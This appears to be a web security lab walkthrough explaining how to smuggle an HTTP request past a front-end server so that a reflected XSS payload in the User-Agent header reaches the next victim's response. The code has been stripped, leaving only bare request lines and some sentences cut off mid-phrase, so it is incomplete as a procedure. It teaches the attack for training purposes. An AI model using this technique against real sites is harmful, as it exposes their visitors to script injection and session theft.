Lab: Exploiting HTTP request smuggling to deliver reflected XSS
This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding.
The application is also vulnerable to reflected XSS via the
To solve the lab, smuggle a request to the back-end server that causes the next user's request to receive a response containing an XSS exploit that executes
The lab simulates the activity of a victim user. Every few POST requests that you make to the lab, the victim user will make their own request. You might need to repeat your attack a few times to ensure that the victim user's request occurs as required.
Visit a blog post, and send the request to Burp Repeater.
Observe that the comment form contains your
User-Agent header in a hidden input.
Inject an XSS payload into the
User-Agent header and observe that it gets reflected:
Smuggle this XSS request to the back-end server, so that it exploits the next visitor:
POST / HTTP/1.1
GET /post?postId=5 HTTP/1.1
Note that the target user only browses the website intermittently so you may need to repeat this attack a few times before it's successful.